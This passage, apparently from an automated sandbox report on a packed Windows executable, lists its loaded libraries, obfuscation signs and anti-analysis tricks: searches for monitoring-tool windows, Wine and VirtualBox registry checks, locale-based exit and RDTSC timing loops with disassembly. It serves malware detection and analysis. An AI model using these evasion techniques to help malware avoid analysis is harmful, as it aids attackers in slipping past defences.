              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1772032 > 1048576
              Source: file.exeStatic PE information: Raw size of yyknqjng is bigger than: 0x100000 < 0x196600

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.590000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yyknqjng:EW;ncuennkv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yyknqjng:EW;ncuennkv:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005B63C0
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b89ce should be: 0x1b2722
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: yyknqjng
              Source: file.exeStatic PE information: section name: ncuennkv
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B88BA push 2C28C914h; mov dword ptr [esp], eax0_2_009B8925
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DE0DD push ebp; mov dword ptr [esp], edi0_2_009DE0E1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DE0DD push ebx; mov dword ptr [esp], edi0_2_009DE0F8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DE0DD push edx; mov dword ptr [esp], 2A0B6282h0_2_009DE274
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008930C7 push 5E1F47ABh; mov dword ptr [esp], eax0_2_0089312D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008930C7 push 0D682E55h; mov dword ptr [esp], ebx0_2_00893135
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008930C7 push ebp; mov dword ptr [esp], esi0_2_0089313F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008930C7 push 7A058314h; mov dword ptr [esp], eax0_2_0089316B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008930C7 push ebx; mov dword ptr [esp], edx0_2_00893197
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008930C7 push edx; mov dword ptr [esp], 6FFE5741h0_2_008931A4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008930C7 push edx; mov dword ptr [esp], 103A2C13h0_2_008932DE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098680C push ebp; mov dword ptr [esp], ecx0_2_00986810
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B78C5 push ecx; ret 0_2_005B78D8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push 30C86650h; mov dword ptr [esp], ecx0_2_0094A109
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push 01AEDA84h; mov dword ptr [esp], ebp0_2_0094A117
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push edi; mov dword ptr [esp], ecx0_2_0094A13E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push 5E391000h; mov dword ptr [esp], ecx0_2_0094A1D8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push ebp; mov dword ptr [esp], 56DF5C47h0_2_0094A1DC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push edx; mov dword ptr [esp], 2A48B9E7h0_2_0094A253
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push 3A63CC32h; mov dword ptr [esp], edi0_2_0094A2B4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push 7B7BB663h; mov dword ptr [esp], ebp0_2_0094A2F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push edi; mov dword ptr [esp], ecx0_2_0094A34C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push 149BBE3Dh; mov dword ptr [esp], ebp0_2_0094A3E6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push ebx; mov dword ptr [esp], eax0_2_0094A430
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push ebx; mov dword ptr [esp], ecx0_2_0094A453
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push eax; mov dword ptr [esp], edi0_2_0094A540
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push eax; mov dword ptr [esp], ebp0_2_0094A5BD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push 1BBA87D9h; mov dword ptr [esp], edx0_2_0094A680
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push ebp; mov dword ptr [esp], edi0_2_0094A6A6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push edi; mov dword ptr [esp], eax0_2_0094A6EB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push 54CBE297h; mov dword ptr [esp], edi0_2_0094A71A
              Source: file.exeStatic PE information: section name: yyknqjng entropy: 7.953203836513533

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005B63C0

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-28679
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958BC1 second address: 958C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F3BACE24FF0h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F3BACE24FE8h 0x00000012 pop edi 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F3BACE24FDDh 0x0000001c jmp 00007F3BACE24FE1h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 pop edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958C12 second address: 958C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957B71 second address: 957B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957B76 second address: 957B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3BAC7E5E06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957FA5 second address: 957FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958125 second address: 958135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3BAC7E5E0Ah 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958135 second address: 95816A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3BACE24FE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F3BACE24FE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9582F2 second address: 9582F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AAD1 second address: 95AAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3BACE24FD6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3BACE24FE3h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AAF3 second address: 95AB2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F3BAC7E5E16h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jl 00007F3BAC7E5E10h 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AB2F second address: 95AB46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jl 00007F3BACE24FD6h 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AB46 second address: 95AB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95ABA4 second address: 95ABA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95ABA8 second address: 95ABD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov esi, dword ptr [ebp+122D2A29h] 0x0000000e push 00000000h 0x00000010 or dword ptr [ebp+122D2488h], ecx 0x00000016 push BC0D12F5h 0x0000001b pushad 0x0000001c jns 00007F3BAC7E5E0Ch 0x00000022 js 00007F3BAC7E5E0Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95ABD8 second address: 95AC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 43F2ED8Bh 0x0000000c mov esi, dword ptr [ebp+122D2CB9h] 0x00000012 and esi, dword ptr [ebp+122D2AA1h] 0x00000018 push 00000003h 0x0000001a jnc 00007F3BACE24FD9h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F3BACE24FD8h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c xor esi, 3ABA2BE3h 0x00000042 push 00000003h 0x00000044 mov edx, dword ptr [ebp+122D227Ah] 0x0000004a or dword ptr [ebp+122D233Ch], ecx 0x00000050 push AD977D11h 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F3BACE24FE4h 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AC4C second address: 95AC59 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AD29 second address: 95AD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AD2E second address: 95AD33 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AD33 second address: 95AD7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d jmp 00007F3BACE24FE7h 0x00000012 popad 0x00000013 nop 0x00000014 mov ecx, dword ptr [ebp+122D2CCDh] 0x0000001a push 00000000h 0x0000001c mov si, di 0x0000001f push 72310695h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F3BACE24FE4h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AD7F second address: 95AD85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AD85 second address: 95AD89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AFB4 second address: 95AFBE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AFBE second address: 95B000 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3BACE24FE4h 0x00000008 jmp 00007F3BACE24FDEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 jnl 00007F3BACE24FEDh 0x0000001a jc 00007F3BACE24FDCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B000 second address: 95B05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov edi, 5E161700h 0x0000000b adc edx, 52ABE20Ah 0x00000011 push 00000003h 0x00000013 mov edi, dword ptr [ebp+122D232Bh] 0x00000019 push 00000000h 0x0000001b and edi, dword ptr [ebp+122D20A1h] 0x00000021 mov edx, dword ptr [ebp+122D214Bh] 0x00000027 push 00000003h 0x00000029 mov edx, eax 0x0000002b call 00007F3BAC7E5E09h 0x00000030 pushad 0x00000031 push edx 0x00000032 js 00007F3BAC7E5E06h 0x00000038 pop edx 0x00000039 jns 00007F3BAC7E5E0Ch 0x0000003f popad 0x00000040 push eax 0x00000041 pushad 0x00000042 jmp 00007F3BAC7E5E0Dh 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B05D second address: 95B0DF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F3BACE24FE1h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jnc 00007F3BACE24FE4h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007F3BACE24FE4h 0x00000021 pop eax 0x00000022 add cx, B841h 0x00000027 lea ebx, dword ptr [ebp+1244E9E3h] 0x0000002d mov edi, dword ptr [ebp+122D2CB5h] 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 jmp 00007F3BACE24FE9h 0x0000003a pop eax 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f jl 00007F3BACE24FD6h 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CB7E second address: 96CB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97913A second address: 979146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F3BACE24FD6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979146 second address: 979150 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3BAC7E5E06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979150 second address: 97915E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F3BACE24FD6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97943A second address: 97944C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007F3BAC7E5E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97944C second address: 979452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979452 second address: 979456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979456 second address: 97949D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3BACE24FD6h 0x00000008 jne 00007F3BACE24FD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F3BACE24FD8h 0x00000016 pushad 0x00000017 popad 0x00000018 js 00007F3BACE24FFCh 0x0000001e jmp 00007F3BACE24FE7h 0x00000023 jmp 00007F3BACE24FDFh 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9795EF second address: 9795F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9795F5 second address: 9795FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9795FD second address: 979601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979601 second address: 979610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FDBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979F94 second address: 979FA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F3BAC7E5E06h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979FA1 second address: 979FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F007 second address: 96F00D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F00D second address: 96F01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F3BACE24FD6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F01D second address: 96F02C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F3BAC7E5E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97AA84 second address: 97AA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97AD23 second address: 97AD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E12h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97AD39 second address: 97AD54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FE7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97AD54 second address: 97AD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F3BAC7E5E06h 0x0000000d jns 00007F3BAC7E5E06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97AD69 second address: 97AD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3BACE24FD6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97B070 second address: 97B076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97B076 second address: 97B084 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F3BACE24FD6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97B084 second address: 97B08A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 980D9E second address: 980DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3BACE24FDFh 0x0000000a jp 00007F3BACE24FD6h 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986C8E second address: 986C9A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3BAC7E5E0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986C9A second address: 986CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnl 00007F3BACE24FD6h 0x0000000b jmp 00007F3BACE24FE7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9860FC second address: 986114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F3BAC7E5E11h 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986AE9 second address: 986AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986AEF second address: 986B20 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3BAC7E5E11h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3BAC7E5E14h 0x00000016 rdtsc
